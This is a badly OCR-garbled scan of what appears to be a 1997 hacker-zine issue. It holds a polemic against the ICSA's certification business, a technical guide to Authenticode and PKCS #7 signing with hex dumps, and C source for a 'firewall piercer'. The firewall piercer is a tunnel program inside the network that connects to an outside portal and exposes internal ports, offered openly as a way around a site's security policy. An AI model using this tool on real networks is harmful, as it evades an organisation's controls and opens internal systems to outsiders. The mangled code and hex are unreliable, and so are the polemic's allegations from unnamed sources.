This is where the ICSA differs from real industry organizations like the IEEE. 
Non-profit organizations like the IEEE can provide independent and objective 
services, for-profit organizations like ICSA cannot be trusted to do so. 

The goal of the NSCA is profit, nothing more and nothing less. 


Profit is a desirable goal in a business. However, the ICSA pretends to be 
an industry association. This is a complete and total fabrication. ICSA is 
not an industry association -- it is a for-profit enterprise that competes for 


business directly with the companies it pretends to help. 
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Let’s look at the ICSA’s knowledge of computer security: 


"Barly computer security issues focused on virus protection. " 


This is where the ICSA accidentally informs us if their true history. No one 
with half of a clue would claim that "Early computer security issues focused 
on virus protection." In reality, early computer security issues focused on 
the protection of mainframe systems. Virus protection did not become a 
concern until the 1980’s. We can only conclude that no one at the ICSA has a 
background in computer security outside of personal computer security. These 
folks seem to be Unix illiterate -- not to speak of VM, MVS, OS/400, AOS/VS, 
VMS or a host of other systems where corporations store vast amounts of data. 
Focusing primarily on PC security will not benefit the overall security 
posture of your organization. 


Let’s look at another baseless claim of the ISCA: 


"ICSA consortia facilitate an open exchange of information among 
security industry product developers and security service 
providers within narrow, but well defined segments of the 
computer security industry." 


According to the "security industry product developers and security service 
providers" that I have spoken with, this is complete hogwash. The word on the 
street is that the ICSA folks collect information and then give nothing useful 
in return. My response is "How could they?" No one at ICSA has any 
information to offer. You would do as well to ask your 12 year old daughter 
for information about computer security -- and you might even do better, if 
your daughter reads Phrack. 


Let’s look at what the ICSA has to say about their Web Certification program: 


"The ICSA Web Certification materially reduces web site risks 
and liability for both operator and visitor by providing, 
verifying and improving the use of logical, physical and 
operational baseline security standards and practices." 


"Comprised of a detailed certification field guide, on-site 
evaluation, remote test, random spot checks, and an evolving set 
of endorsed best practices, ICSA certification uniquely 
demonstrates management’s efforts to assure site availability, 
information protection, and data integrity as well as enhanced 
user confidence and trust." 


What really happens is that ICSA sends out a reseller to your site. The 
reseller then asks you if you have set up your site correctly. You tell the 
reseller that you have, and then the reseller tells ICSA that you have set up 
your site correctly. Very few items are actually verified by the reseller. 

ICSA then runs ISS (Internet Security Scanner) against your web server. If ISS 
cannot detect any security vulnerabilities remotely, you receive ICSA Web 
Certification. 


For grilling your staff with a series of almost meaningless questions, the 
reseller receives $2,975 US dollars. For running ISS against your web server, 
ICSA receives $5,525. For $19. 95, you can buy a copy of Computer Security 
Basics by Deborah Russell and G.T. Gangemi Sr. (ISBN:0-937175-71-4) and save 
your company almost $8,500. 
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Let’s look at the ICSA’s Reseller Training: 


ICSA states that every reseller that delivers their product is trained in 
computer security. In practice, however, this training is actually _sales_ 
training. The ICSA training course lasts for less than one day and is 
supposed to be conducted by two trainers, one sales person and one technical 
person. One recipient of this training told me that the technical person did 
not bother to show up for his training, while another recipient of this 
training told me that ICSA instead sent _two_ sales people and _no_ technical 
people to his training. 


Let’s look at what ICSA says about change in the "digital world" of 
firewalls: 


"The digital world moves far too quickly to certify only a 
particular version of a product or a particular incarnation of a 
system. Therefore, ICSA certification criteria and processes are 
designed so that once a product or system is certified, all 
future versions of the product (or updates of the system) ar 
inherently certified." 


What does this mean to you? It means that ICSA is certifying firewalls 
running code that they have never seen. It means that if you purchase a 
firewall that has been ICSA certified -- you have no way of knowing if the 
version of the firewall product that is protecting your organization has ever 
been certified. 


Let’s look at how ICSA defends itself from such allegations? ISCA has 
three ready made defenses: 


"First, the ICSA gains a contractual commitment from the 
product vendor or the organization that owns or runs the 
certified system that the product or system will be maintained 
at the current, published ICSA certification standards. " 


So that’s how ICSA certification works, the firewall vendors promise to write 
good code and ICSA gives them a sticker. This works fine with little children 
in Sunday school, but I wouldn’t trust the security of my business to such a 
plan. 


"Secondly, ICSA or it’s authorized partners normally perform 
random spot checking of the current product (or system) against 
current ICSA criteria for that certification category. " 


Except, of course, that an unnamed source within ICSA itself admitted that 
these spot checks are not actually being done. That’s right, these spot 
checks exist only in the minds of the marketing staff of the ICSA. ICSA 
cannot manage to cover the costs of spot checking in their exorbitant fee 
structure. They must be spending the money instead on all of those free 
televisions they are giving away to their resellers. 


"Thirdly, ICSA certification is renewed annually. At renewal 
time, the full certification process is repeated for the current 
production system or shipping products against the current 
criteria. " 


Well here we have the final promise -- our systems will never out of 
certification for more than 364 days. If our firewall vendor ships three new 
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releases a year at least one of them will go through the actual ICSA 
certification process. Of course, all of them will have the ICSA certification 
sticker. 


Let’s looks at what ICSA has to say about their procedures: 


"The certification criteria is not primarily based on 
fundamental design or engineering principles or on an assessment 
of underlying technology. In most cases, we strive to use a 
black-box approach. " 


Listen to what they are really saying here. They are admitting that their 
certification process does not deal with "fundamental design or engineering 
principles" or on an "assessment of underlying technology". What else is left 
to base a certification upon? Do they certify firewalls based upon the 
firewall vendors marketing brochures? Upon the color of their product boxes? 
Upon the friendliness of their sales staff? Or maybe they just certify anyone 
who gives them money. 


When you are clueless, every computer system must look like a "black-— 
box" to you. 


Let’s look at how the ICSA web certification process deals with CGI 
vulnerabilities: 


"The Site Operator attest that CGIs have been reviewed by 
qualified reviewers against design criteria that affect 
security. " (sic) 


Let’s take a close look at this. The #1 method of breaking into web servers 
is to attack a vulnerable CGI program. And the full extent that the ICSA 
certification deals with secure CGI programming is to have your staff attest 
that they have done a good job. What sort of employee would respond "Oh no, 

we haven’t even looked at the security of those CGI bins?" The ICSA counts on 
employees trying to save their jobs to speed the certification process along 
to it’s conclusion. 


Let’s look at what ICSA has to say about it’s own thoroughness: 


"Because it is neither practical nor cost effective, ICSA does 
not test and certify every possible combination of web sites on 
a web server at various locations unless requested to, and 
compensated for, by Customer. " 


We all know that security is breached at it’s weakest link, not it’s 
strongest. If we choose to certify only some of our systems, we can only 
assume that attackers will them simply move on and attack our unprotected 
systems. Perhaps if ICSA did not attempt to extort $8,500 for a single web 
server certification, more customers could have all of their web sites 
certified. 


Let’s look at how much faith ICSA puts in their own certifications: 


"Customer shall defend, indemnify, and hold ICSA harmless from 
and against any and all claims or lawsuits of any third party 
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and resulting costs (including reasonable attorneys’ fees), 
damages, losses, awards, and judgements based on any claim that 
a ICSA-certified server/site/system was insecure, failed to meet 
any security specifications, or was otherwise unable to 
withstand an actual or simulated penetration. 


In plain English, they are saying that if you get sued, you are on your own. 
But wait, their faithlessness does not stop there: 


Let’s look at how the ICSA sees it’s legal relationship with it’s 
customers: 


"Customer, may, upon written notice and approval of ICSA, assume 
the defense of any claim or legal proceeding using counsel of 
it’s choice. ICSA shall be entitled to participate in, but not 
control, the defense of any such action, with it’s own counsel 
and at it’s own expense: provided, that if ICSA, it its sole 
discretion, determines that there exists a conflict of interest 
between Customer and ICSA, ICSA shall have the right to engage 
separate counsel, the reasonable costs of which shall be paid by 
the customer. " 


What you, the customer, agree to when you sign up for ICSA certification is 
that you cannot even legally defend yourself in court until you have "written 
notice and approval of ICSA. " But it’s even worse that that, ICSA then 
reserves the right to hire lawyers and bill YOU for the expense if it feels 
that you are not sufficiently protecting it’s interests. Whose corporate 
legal department is going to okay a provision like this? 


Let’s look at how much the ICSA attempts to charge for this garbage: 


Web Certification 


1 Server $8,500 
2-4 Servers $7,650 
5 or more Servers $6,800 
6-10 DNS S$ 495 
11 or more DNS Su 13.05) 


Perimeter Check 


up to 15 Devices $3 4°99'5: 

additional groups of 10 Devices $1,500 

bi-monthly reports $1,000 

monthly reports $3,500 
War Dial 

first 250 phone lines $1,000 

additional lines $3/line 


Per Diem 


Domestic S$ 995 
International $1,995 


Certifying one web server will cost you $8,500. I have seen small web servers 


14.txt Wed Apr 26 09:43:42 2017 6 


purchased, installed, and designed for less than that amount. 


If you tell the ICSA that you have 15 network devices visible on the Internet 
and they discover 16 devices, they will bill you an additional $1,500. This 
is what you agree to when you sign a ICSA Perimeter Check contract. In 
effect, when you sign up for an ICSA Perimeter Check, you are agreeing to pay 
unspecified fees. 


To dial an entire prefix the ICSA will charge you $30,250. I wonder if these 
folks are using ToneLoc. I wonder if these fools are even using modems... 


I will leave judgement on the per diem rates to the reader. How much would 
you pay for a clown to entertain at your daughters birthday party? Would you 
give the clown a daily per diem of $995? Why would you feel the ICSA clowns 
might deserve better? How do you spend $995 a day and still manage to put in 
some work hours? 


These are just a few excerpts from some ICSA documentation I managed to get my 
hands on. I do not feel my assessment has been any more harsh than these 
people deserve. I am certain that if I had more of their literature, ther 
would be even more flagrant examples of ignorance and greed. 


ICSA feeds on business people who are so ignorant as to fall for the ICSA 
propaganda. By masquerading as a legitimate trade organization, they make 
everyone in the data security industry look bad. By overcharging the 
clientele, they drain money from computer security budgets that could better 


be spent on securing systems and educating users. By selling certifications 
with no actual technical validity behind them they fool Internet users into a 
false sense of security when using commerce sites. 


ISCA is good for no one and it is good for nothing. 


Dorathea Demming 
Mechanicsburg, PA 
10 Oct, 1997 


----[ EOF 
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[ Technical Guide to Digital Certification 


a at la [ Yggdrasil 


Introduction 

Today’s software technology provides not only flexible controls for web pages 
and complex remote interaction (ActiveX controls, Java applets and Netscape 
plugins) but also offers the possibility of downloading pieces of code for 
local execution to extend browsers capabilities. A major issue being the 
fact that this code cannot be initially distinguished from malicious code 
(virii/trojans, "man in the middle" attacks, forced downgrade, forgery of 
electronic documents, etc), disguised as utilities. 


The point is that end users do not know who published of a piece of software, 
if the code has been tampered with, and what that software will do, (until they 
download and execute it). Anyone can create plugins, applets or controls 
containing this potentially destructive code or even "intelligent" malevolent 
code, able to communicate covertly with a remote server. 


Public-key cryptography has produced a number of different implementations 
to verify the authenticity of software, network objects, documents and data 
transactions (for example, Electronic Funds Transfer) using Digital IDs. 


Authenticode Certifications 

Microsoft recently adopted Authenticode technology to sign their ActiveX 
based software. Any individual or commercial software publisher desiring 
their code to be "trusted" must apply for and receive a Digital Certificate 
from an Authenticode Certificate Authority (CA), such as VeriSign. The CA 
will request proof-of-identity, and other information, only then will they 
verify the publishers credentials (even employing Dun & Bradstreet rating). 
After the CA has decided that the publisher meets its policy criteria, it 
releases a Certificate (th xpected cost is about $500 for a year, plus 
additional costs for hardware storage for commercial developers, up to 
$12,000). 


[ God save the next-generation developers. ] 


A Digital Certificate contains the publishers public-key (and other info) 
encrypted according to the industry standard X.509 V3 certificate format and 
PKCS #7 signed data standards. 


The ITU-T recommendation for X.509 states that: 


"It would be a serious breach of security if the CA issued a certificate for 
a user with a public key that had been tampered with." 


All Certificates have an expiration time, but the CA may revoke them prior 
to that time if a publisher’s private-key or CA’s certificate is assumed to 
be compromised. The CA may (or may NOT) inform the owner of the certificate. 


Revocation Lists 


[The Revocation Lists, also called "black-lists", are held within entries as 
attributes of types CertificateRevocationList and AuthorityRevocationList. 


Their attribute types are defined as follows: 


certificateRevocationList ATTRIBUT 


ea 
ll 
pas 
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WITH SYNTAX CertificateList 
EQUALITY MATCHING RULE certificateListExactMatch 
ID id-at-certificateRevocationList } 


authorityRevocationList ATTRIBUTE ::= { 

WITH SYNTAX CertificateList 
EQUALITY MATCHING RULE certificateListExactMatch 
ID id-at-authorityRevocationList } 


CertificateList ::= SIGNED { SEQUENCE { 
version Version OPTIONAL, 
signature AlgorithmIdentifier, <----4 + 
issuer Name, 


thisUpdate UTCTime, 

nextUpdate UTCTime OPTIONAL, version 2 
revokedCertificates SEQUENCE OF SEQUENCE { only 
userCertificate CertificateSerialNumber, (extension) 


revocationDate UTCTime, 
crlEntryExtensions Extensions OPTIONAL } OPTIONAL, 
crlExtensions [0] Extensions OPTIONAL }} <----4 + 


Implementation of X.509-3 

The ITU-T X.509 Directory Specification makes use of a set of cryptographic 
systems known as asymmetric Public-Key Crypto-Systems (PKCS). This system 
involves the use of two keys (one secret and one public as used in common 
public key packages like PGP). 


Both keys can be used for encoding: the private key to decipher if the 
public key was used, and vice versa (Xp*Xs = Xs*Xp, where Xp/Xs are the 
key-encoding/decoding functions). 


When applied to Digital Signatures, the public key encryption is used to 
encipher the data to be signed after it’s passed through a hash function. 
Information is signed by appending to it an enciphered summary of the info. 
The summary is produced by means of a one-way hash function, while the 
enciphering is carried out using the private key of the signer. 


For further information about X.509 and certificate types please read 
the ITU-T Recommendation X.509 ("The Directory: Authentication Framework"). 


Windows Trust API 


To ascertain an objects reliability under Win32, the WinVerifyTrust() API 


function is used, according to its prototype as follows: 

HRESULT Description 

WINAPI 

WinVerifyTrust ( 
HWND hwnd, <>0 to allow user to assist in trust decision 
DWORD dwTrustProvider, 0 = provider unknown, 1 = software publisher 
DWORD dwActionID, specifies what to verify 
LPVOID ActionData information required by the trust provider 


) 


The HRESULT return code will be TRUST_E_SUBJECT_NOT_TRUSTED if the object 
is not trusted (according to the specified action in dwActionID). An error 
code more detailed than this could be provided by the trust provider. 


Creation of a Digitally Signed message 
PKCS #7 specifies several "types", such as ContentInfo, SignedData and 
SignerInfo. Version 1.5 of PKCS #7 describes the ContentInfo type as: 


ContentInfo ::= SEQUENCE { 
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contentType ContentType, 
content 
[0] EXPLICIT ANY DEFINED BY contentType OPTIONAL } 


5 


ContentType ::= OBJECT IDENTIFIER 


the content is (or better: MAY be) an octet-stream ASCII string to be passed 
to the selected digest algorithm (an example is MD2, see RFC-1321). 


[The first step is to encode the ContentInfo field according to PKCS #7. 
This is the resulting encoded data: 


== DATA BLOCK #1 == 


{30 28} 06 09 0x0609: contentType = data 
2A 86 48 86 F7 OD 01 O07 O1 PKCS #7 data-object ID 
AO 1B [0] EXPLICIT 
04 [msg_len] content = OCTET STRING 
[octet stream representing 
the ASCII string, msg_len bytes long] <-- value (*) 


This (*) data is the input stream to the encoding algorithm (MD2 or other): 
(the identifier of the PKCS #7 data object is {1 2 840 113549 1 7 1}) 


== DATA BLOCK #2 == 


{30 20} 30 OC Ox300C: digestAlgorithm 

06 08 2A 86 48 86 F7 OD 02 02 algorithm ID = MD2 

05 00 parameters = NULL (0x00) 
04 [block_len] digest 


[encoded data (MD2 output) ] 


(the object identifier of the MD2 algorithm is {1 2 840 113549 2 2}) 


This data is th ncoded DigestInfo. It will be encrypted under RSA using 
the user’s private key. 


According to PKCS #1, RSA encryption has two main steps: an encryption data 
block is constructed from a padding string and the prefixed message digest; 
then the encryption block is exponentiated with the user’s private key. 


The encryption block EB is the following 64-octet string: 


00 O1 block type 

FEF FF FF FEF FF FF FF FF FF FEF FF FF FF FE padding string 

FEF FF FF FEF FF FF FF FF FF FF FF FF FF 

00 separator (0x00) 

[here goes the whole DATA BLOCK #2] data bytes (prf. message digest) 


Now we need to encode various information: a SignedData value from the inner 
ContentInfo value, then th ncerypted message digest, the issuer and serial 
number of the user’s certificate, the certificate data, the message digest 
algorithm ID (MD2) and the encryption algorithm ID (PKCS #1 RSA). 


The encoded SignedData is: 


== DATA BLOCK #3 == 


30 82 02 3D 
02 01 O01 version = 1 
31 [size of inner data block] digestAlgorithms 
30 [size] 
06 08 2A 86 48 86 F7 OD 02 02 algorithm ID = MD2 
05 00 parameters = NULL (0x00) 
[ContentInfo data] content = inner ContentInfo 
AO 82 01 [size] certificates 


[certificate data] user’s certificate 


B.A.) 
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31 81 [size] signerInfos 
30 81 [size] 
02 01 O1 version = 1 
30 [size] issuerAndSerialNumber 
issuer data] issuer 
02 04 {12 34 56 78} size (4), serialNumber 
30 [alg_size] digestAlgorithm 
06 08 2A 86 48 86 F7 OD 02 02 algorithm ID = MD2 
05 00 parameters = NULL (0x00) 
30 [dig_size] digestEncryptionAlgorithm 
06 [sz] rsaEncryption (d. 
2A 86 48 86 F7 OD 01 01 O1 
05 00 parameters = NULL (0x00) 
04 [data_size] encryptedDigest 
[encrypted digestInfo encoded data block] 
Finally, a ContentInfo value from this SignedData data block is encoded 
again, using PKCS #7): 
30 82 02 [size] 


(th 


06 09 2A 86 48 86 F7 OD 01 O07 02 
AO 82 02 [size] 
re goes the whole DATA BLOCK #3] 


[h 


30 
82 
2A 
48 
OF 
72 
02 
O1 
13 
78 
69 
38 
30 
aye) 


82 
02 
86 
86 
20 
69 
04 
Ol 
02 
61 


HEX Dump 


02 
41 
48 
F7 
43 
6E 
14 
02 
oie} 
6D 


contentType = signedData 


[0] EXPLICIT 


content = SignedData value 


30 
86 
OD 
6F 
67 
00 
05 
53 
70 


6F 
30 
39 
53 
70 
Sal! 
OF 
F7 
719 
C6 


B3 E 


Al 
O1 
05 
76 
9A 
B2 
11 
30 
1D 
65 
14 
05 
00 


E 30 


5A 
30 
1D 
65 
30 
a }S) 
O1 
C6 
10 
78 
E6 
O1 
03 
9D 
1F 
77 
9D 
31 
1B 
4F 
00 
30 
40 


02 
OD 
07 
74 
82 
29 
30 
1D 
65 
ley 
OD 
31 
1B 
4F 
06 
65 
O1 
81 
00 
1D 
DC 
OD 
00 
F7 
95 
CA 
16 
30 
03 
67 
30 
06 
FA 


3D 
02 
O1 
65 
O1 
30 
20 
30 
20 
OD 
39 
OB 
06 
HZ 
03 
72 
05 
68 
75 
E5 
9A 
06 
45 
32 
DF 
EF 
31 
09 
3D 
61 
le 
09 
6A 


O1 
05 
1B 
74 
30 
06 
OB 
06 
72 
32 
30 
09 
55 
61 
04 
5B 
03 
7A 
29 
5A 
FS 
2A 


Al E 


6F 
94 
FC 
9B 
03 
OA 
69 
08 
86 
2E 


50 06 09 2A 86 48 86 F7 OD O1 


30 
06 
20 
OF 
30 
48 
03 
OA 
69 
39 
32 
04 
14 
61 
41 
09 
47 
BB 
8D 
94 
20 
F7 
20 
57 
AO 
C2 
02 
13 
78 
69 
86 
OD 
F4 


AO On, Peete Mas 


object identifier of PKCS #7 signedData is {1 2 840 113549 1 7 2}) 


08 
86 
6D 
74 
04 
OD 
06 
45 
74 
31 
38 
02 
61 
6F 
65 
48 
OA 
ore) 
DO 
O1 
02 
O01 
CD 
64 
4A 
7C 
30 
53 
70 
02 
02 
O1 
25 


o ContentInfo st 
Pingo .°0. 220% . 
SO se RH. so 
5. 2 3 Op 130%. 8 UG 4 
» USL. OsjecUy cod 
xample Organizat 
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Many other demo (not only ;) keys, tons of related C++ source/libraries for 
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"That which does not kill us 
makes us stronger" 
-- Friedrich Nietzsche 
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[ Piercing Firewalls 


Bonivoses [ bishnu@hotmail.com 


Introduction: 
Many ISPs manage a firewall to protect their users against the hostile 
Internet. While the firewall might protect the users, it also serves to limit 


ct 


heir freedom. 


Most firewalls don’t allow a connection to be established if the 
initiative is coming from the outside, as this automatically disables many 
security vulnerabilities. Unfortunately, this also means that many other 
things are not possible; for example, sending an X-display to a machine behind 
the firewall, or something similar. 


One solution is to ask the firewall administrator to configure the firewall 
not to disable X connections (or the port you plan to use. This normally 
means allowing connections on port 6000 to penetrate the firewall. But often 
the admin does not want to, as he is either too busy, hasn’t figured out how 
to configure the firewall yet, or simply refuses to, as it violates the site 
security policy. Maybe you don’t even want him to know that you plan to send 
some traffic backwards. 


For this purpose I wrote two simple programs that transmit TCP connections 
back thorough a tunnel, to your machine. 


The tunnel: 


The solution is two programs, one running at your machine, or some other 
machine behind the firewall, and another running at some *NIX-box on the 
Internet. The program behind the firewall (called tunnel) connects to a 
program (called portal) on the machine on the Internet. This connection 
probably won’t be intercepted by the firewall (depending on the security 
policy), as it is outgoing. Once the connection from the tunnel to the portal 
is established, the portal opens a port for incoming TCP traffic, and we are 
ready to rock. Whenever a machine connects to the portal it sends the request 
back to the tunnel thorough the already established connection through the 
firewall, the tunnel will then forward the connection to your machine. 


The effect will be that you drag a port on your machine (or any machine 
behind the firewall) onto the other side of the firewall, which means that 
anyone can connect to it regardless of the site’s security policy. 


An example: 


Goof: Your machine. 

Foo : Some other machine behind the firewall or same as Goof, running ’tunnel’. 
Bar : Some machine on the other side of the firewall running ’portal’. 

Boof: Some machine wanting to connect to machine Goof, or same as Bar. 


FIREWALL 

tunnel a portal 
HEH HHH HF . HHH Hitt 
# Foo # # Bar # 
HEH HEH HF * HHH Ht # 

# # & # 

Goof . Boof 

# # a # 
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FIREWALL 


You are sitting on machine Goof, and you run some program on machine Boof, 
this program happens to be using X-windows, so you want to send the display 
back to machine Goof. X-windows tries to establish a TCP connection through 
the firewall, which is ’burned’. 


So you start the tunnel on machine Foo, and set it to connect to machine 
Bar at lets say port 7000 (where the portal is running), also you set the 
tunnel to forward all TCP connections, coming back from the portal, to your 
machine Goof on port 6000 (X-windows). You start the portal on machine Bar, 
and you make it listen for the tunnel on port 7000. Once the tunnel has 
connected, the portal listens on port 6001 for incoming X. Whenever some 
X-application connects to the portal, the connection is passed to the tunnel, 


which then forwards it to machine Goof on port 6000. 


Finally on machine Boof you set your display to machine Bar:1 (in a tcsh 
type ’setenv DISPLAY bar:1’, in bash ’export DISPLAY=bar:1’), which tells the 
application to use port 6001 (We can’t use port 6000 if the machine is running 
a X-server itself). You start your Xeyes, and they pop in your face. 


Conclusion: 
If you use this program to cross a firewall you surely violate the ISP’s 
security policy, as anybody can cross it as well, that is if they know, and 


there is nothing like security by obscurity. So don’t tell your mom. 


An advantage of this approach is that you don’t need to have root access on 
either machine, which is makes the whole process a bit easier. 


To compile the code, just do a ‘make’. It has been tested on 
Solaris 2.5.x, 2.6 
IRIX 6.[2,3,4] 
FreeBSD 2.1.5 
HPUX 10.x 
Linux 2.0.x 


----[ THE CODE 


<++> tunnel/Makefile 
CC = gec 


OSFLAGS = 
MYFLAGS Wall -02 -g -pedantic 
CFLAGS = S(MYFLAGS) $(PROFILE) S$ (OSFLAGS) 


If you compile on Solaris 2.x, uncomment the following line 
LOCAL_LIBRARIES = -lsocket 


UNNEL_OBJFIL 
PORTAL_OBJF ILI 


= tunnel.o share.o 
= portal.o share.o 


ES 
ES 


all: tunnel portal 


tunnel : S$ (TUNNEL_OBJFILES) share.h 
$(CC) $(TUNNEL _OBJFILES) $ (LOCAL LIBRARIES) -o tunnel 
tunnel.o : tunnel.c share.h 
S$(CC) -c S$(CFLAGS) $(COMMFLAGS) tunnel.c 
portal : S$ (PORTAL_OBJFILES) share.h 
$(CC) $(PORTAL_OBJFILES) $(LOCAL_LIBRARIES) -o portal 
portal.o : portal.c share.h 
$(CC) -c $(CFLAGS) $(COMMFLAGS) portal.c 


share.o : share.c share.h 
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S$(CC) -c S$(CFLAGS) $(COMMFLAGS) share.c 


clean: 
rm -f *.o tunnel portal core 
<--> 
<++> tunnel/tunnel.c 
/* 
—-TUNNEL-— 


This is the tunnel part of my firewall piercer. This code is supposed 
to be running on the inside of the firewall. The tunnel should then 
connect to the portal running on the outside. 


start it like: 
>% tunnel localhost 23 protal.machine.com 3001 


if the portal is running at port 3001 at portal.machine.com, incoming 
connections to the portal will get rerouted to this machines telnet 
port. 


a /. 


nclude <stdio.h> 
nclude <stdlib.h> 
nclude <unistd.h> 
nclude <netinet/in.h> 
nclude <sys/socket.h> 
nclude <sys/time.h> 
nclude <string.h> 
nclude <signal.h> 
nclude <errno.h> 
nclude "share.h" 


ee ee ee 


extern char tunnel_buf [MAXLEN*2]; 
char buf [MAXLEN*2]; 
extern int tunnel_des; /* The socket destination of a tunnel packet*/ 


extern int tunnel_src; /* The socket source of a tunel packet*/ 

extern int tunnel_size; /* Size of tunnel packet*/ 

extern struct connections connections; /*Linked list of connections*/ 

char *remote_machine; /*remote machine name to tunnel to*/ 
extern int tunnel_port; /*tunnel port*/ 

extern int tunnel_sock; /*tunnel socket*/ 

char *login_machine=""; /*machine to forward connections to*/ 
int login_port; /*port to forward connections to*/ 
int oldtime=0,ping_time=0; 


struct connection *descriptors [DESC_MAX]; 

extern struct connection *descriptors [DESC_MAX]; 

extern int errno; 

FILE *log=stdout; /*logfile = stdout by default*/ 


void open_tunnel () { 
tunnel_sock=remote_connect (remote_machine,tunnel_port); 


} 


extern int optind; 
extern char *optarg; 


void usage () { 

printf ("Usage: tunnel [-l logfile] <forward_machine> <forward_port>" \ 
" <portal_machine> <portal_port>\n"); 
printf ("where:\n"); 
printf ("forward_machine is the machine to which the traffic is forwarded\n") ; 
printf ("forward_port is the port to which the traffic is forwarded\n"); 
printf ("portal_machine is the machine we want to route the trafic from\n"); 
printf ("portal_port is the port we want to route the trafic from\n"); 
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printf ("Coded by %s\n",AUTHOR) ; 
} 


[RR KKK KKK KKK KK OK KKK Get the options KK OK KK KK OK KK / 


void get_options(int argc,char *argv[]) { 
int c; 
while ((c=getopt (argc,argv, "1:")) !=-1) 
switch (c) { 
case 'l1’: 
if (! (log=fopen(optarg, "w"))) { 


log=stdout; 
fprintf(log,"Unable to open logfile '’%s’:%s\n", 
optarg, strerror(errno)); 
} 
break; 
case '?': 
default: 
usage (); 
exit (-1); 
} 
/* the two next options*/ 
if (argc-optind!=4) { 
printf ("Wrong number of options!\n"); 
usage (); 
ext tL); 
} 
login_machine=get_ip (argv[optind++])j; 
login_port=atoi (argv[optind++]); 
remote_machine=get_ip(argv[optindt++]); 
tunnel_port=atoi (argv[optind++]); 
if (Login_port<1||login_port>65535]| |tunnel_port<1]||tunnel_port>65535) { 
printf ("Ports below 1 and above 65535 don’t give any sense\n"); 
usage (); 
exit (-1); 


} 


void alive() { 

/* To check wether the line is still alive, we Myping it every 
ALIVE_TIME seconds. If we don’t get a ping from the tunnel 
every ALIVE_TIME*2 we disconnect the connection to the 
portal, and wait for a new. If the portal has not died, all 
the connections through the tunnel will continue as normal once 
the connection has been established again. 

The reason why I do this is because some firewalls tend to 
disable connections if there hasn’t been any traffic for some time, 
or if the connection had been up too long time. 


a, 


/*Transmit a Myping packet, we receive th 
answer in check_tunnel_connection() */ 
if (time (NULL) -oldtime>=ALIVE_TIME) { 
oldtime=time (NULL) ; 
transmit_tunnel (buf,0,0,0); 


} 
if (time (NULL) -ping_time>ALIVE_TIME*2) { 
printf ("Connection to portal probably lost, hanging up.\n"); 
shutdown (tunnel_sock, 2); 
close (tunnel_sock); 
tunnel_sock=-1; 


} 


int reset_selector(fd_set *selector,fd_set *errsel, struct connection *con) 


{ 


/* We tell the selector to look on the tunnel socket aswell 
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live connections. */ 


int maxsock,i; 


FD_ZERO (sel 


ector); 


FD_SI 
FD_SI 


ma 
ry 
ma 
ry 


[T(tunnel_sock, selector); 
[(tunnel_sock,errsel); 


con=connections.head; 

maxsock=tunnel_sock; 

for (i=0; i<connections.num; i++, con=con->next) { 
FD_SET (con->local_sock, selector) ; 
FD_SET (con->local_sock,errsel); 
maxsock=max (maxsock, con->local_sock); 


} 


return (maxsock); /*We return the maximum socket number*/ 


} 


void check_tunnel_connection(fd_set *selector,fd_set *errsel, struct connection *con) { 


/*Here we check the tunnel for incoming data*/ 
if (FD_ISSET (tunnel_sock,errsel) ) { 


fprintf ( 
shutdown 


log, "Tunnel connection terminated!\n"); 


(tunnel_sock, 2); 


close (tunnel_sock); 
tunnel_sock=—-1; 


return; 
} 
if (FD_ISSET(tunnel_sock, selector) ) { 
if (receive_tunnel () !=-1) { 
if (tunnel_src==0&é&tunnel_des==0) { /*We have a Myping packet*/ 


ping_time=time (NULL); /*reset the alive_timer*/ 


} 


else if (tunnel_src==0){/*We have a ’hangup’ signal for a connection*/ 
if ((con=descriptors[tunnel_des]) ) { 
fprintf(log,"Removing connection to %s %d\n",con->host,con->port) ; 
removeconnection(con); 


} 
} 


else if (tunnel_des==0){ /*We have a new connection*/ 


int newsock; 


if 


connections.numtt+; 


( (newsock=remote_connect (login_machine, login_port) ) !=-1) { 


con=(struct connection *)malloc(sizeof (struct connection) ); 


con->host=(char *)malloc (MAX_HOSTNAME_ SIZE); 


strncpy (con->host, &tunnel_buf[4],MAX_HOSTNAME_SIZE); 

con->port=ntohl((((int *)tunnel_buf) [0])); 

con->local_sock=newsock; 

con->remote_sock=tunnel_src; 

con->time=time (NULL) ; 

con->next=connections.head; 

connections .head=con; 

descriptors [newsock]=con; 

fprintf(log,"Connected the incoming call from %s $d to %s %d\n",con->host,con-> 
port, login_machine, login_port); 

/*Acknowledge the new connection to the portal*/ 

transmit_tunnel (buf,0,con->local_sock, con->remote_sock) ; 


} 
} 


else if (descriptors [tunnel_des]) { 
/*Send the data to the right descriptor*/ 
writen (descriptors [tunnel_des]->local_sock,tunnel_buf,tunnel_size) ; 


} 


elsef{ 


fprintf(log,"Connection to unallocated channel, hangup signal sent\n"); 
/*Send a hangup signal to the portal, to disable the connection*/ 
transmit_tunnel (buf,0,0,tunnel_src); 
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void main(int argc,char **argv) 


{ 


} 


get_options(argc,a 
fprintf (log, "Openi 
fprintf (log, "Tunne 

" port %d\ 
connections.num=0; 
connections.head=N 


rgv); 

ng tunnel to %s port %d\n",remote_machine,tunnel_port); 
lconnections will be forwarded to host %s"\ 

n", login_machine, login_port) ; 


ULL; 


signal (SIGINT, ctrl1C); 


while(1) { 
struct connectio 
open_tunnel (); 
ping_time=time (N 


/*The tunnel runs infinitely*/ 
n *con=connections.head; 


ULL) ; 


while (tunnel_sock!=-1) { 


fd_set selecto 
struct timeval 


r,errsel; 
alive_time; 


alive_time.tv_ 
live_time.tv_usec=0; 
live(); /*Check wether the tunnelconnection is alive*/ 


“Sw o 


* We have to 


we do that with a select call*/ 


sec=ALIVE_TIME; 


listen to the tunnel and all the current connections. 


if (select (reset_selector(&selector, &errsel,con) +1, 


&selector,NULL, &errsel, &alive_time) ) { 
/*Check for each of the local connections*/ 


check_local_ 
/*Check for the tunnel*/ 


connections (éselector, &errsel,con); 


check_tunnel_connection(&selector, &éerrsel,con) ; 


} 


} 
sleep (RETRY_TIME 
/* fprintf(log," 


<--> 
<++> tunnel/portal.c 


/* 
-P 


ORTAL— 


); /*We sleep a while*/ 
Trying to connect to portal.\n"); */ 


This is the portal part of my firewall piercer. This code is supposed 
to be running on the outside of the firewall. The tunnel part should 
then connect trough the firewall to this program. 


st 
>% 
fo 


art it like: 
portal 3000 3001 


r tunnel connection on port 3001 and incoming calls on 3000. 


when you connect to the portal at port 3000 your connection will be 
forwarded to the tunnel. 


#7 


Pep pe pe pe pe pe pe pe pe ee 


/* 
/* 
/* 


nclude <stdio.h> 
nclude <stdlib.h> 
nclude <unistd.h> 
nclude <netinet/in 
nclude <sys/socket 


nclude <string.h> 
nclude <netdb.h> 
